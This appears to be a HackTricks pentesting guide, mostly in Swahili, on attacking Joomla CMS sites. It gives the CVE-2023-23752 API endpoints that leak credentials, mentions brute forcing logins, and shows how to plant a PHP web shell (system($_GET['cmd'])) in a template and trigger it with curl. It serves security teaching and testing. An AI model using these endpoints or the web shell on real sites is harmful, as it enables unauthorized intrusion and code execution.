Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
Joomla inakusanya baadhi ya takwimu za matumizi zisizo na majina kama vile mgawanyiko wa toleo la Joomla, PHP na mifumo ya uendeshaji wa seva zinazotumika kwenye usakinishaji wa Joomla. Takwimu hizi zinaweza kuulizwa kupitia API yao ya umma.
Angalia meta
robots.txt
README.txt
Katika /administrator/manifests/files/joomla.xml unaweza kuona toleo.
Katika /language/en-GB/en-GB.xml unaweza kupata toleo la Joomla.
Katika plugins/system/cache/cache.xml unaweza kuona toleo la takriban.
In 80,443 - Pentesting Web Methodology ni sehemu kuhusu skana za CMS ambazo zinaweza skana Joomla.
Toleo Kuanzia 4.0.0 hadi 4.2.7 lina udhaifu wa ufunuo wa taarifa bila uthibitisho (CVE-2023-23752) ambayo itatoa creds na taarifa nyingine.
Watumiaji: http://<host>/api/v1/users?public=true
Faili ya Mipangilio: http://<host>/api/index.php/v1/config/application?public=true
Moduli ya MSF: scanner/http/joomla_api_improper_access_checks
au script ya ruby: 51334
Unaweza kutumia script hii kujaribu kufanya brute force kwenye kuingia.
Ikiwa umeweza kupata admin credentials unaweza RCE ndani yake kwa kuongeza kipande cha PHP code ili kupata RCE. Tunaweza kufanya hivi kwa kubadilisha template.
Bonyeza kwenye Templates
chini kushoto chini ya Configuration
ili kuleta menyu ya templates.
Bonyeza kwenye jina la template. Hebu chague protostar
chini ya kichwa cha safu ya Template
. Hii itatuletea kwenye ukurasa wa Templates: Customise
.
Hatimaye, unaweza kubonyeza kwenye ukurasa ili kuleta page source. Hebu chague ukurasa wa error.php
. Tutongeza PHP one-liner ili kupata utekelezaji wa code kama ifuatavyo:
system($_GET['cmd']);
Hifadhi & Funga
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Joomla Exploitation Script ambayo inainua XSS hadi RCE au Vitu vingine vya Hatari. Kwa maelezo zaidi angalia hiki chapisho. Inatoa msaada kwa Joomla Versions 5.X.X, 4.X.X, na 3.X.X, na inaruhusu:
Privilege Escalation: Inaunda mtumiaji katika Joomla.
(RCE) Built-In Templates Edit: Hariri Built-In Templates katika Joomla.
(Custom) Custom Exploits: Custom Exploits kwa Plugins za Tatu za Joomla.
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)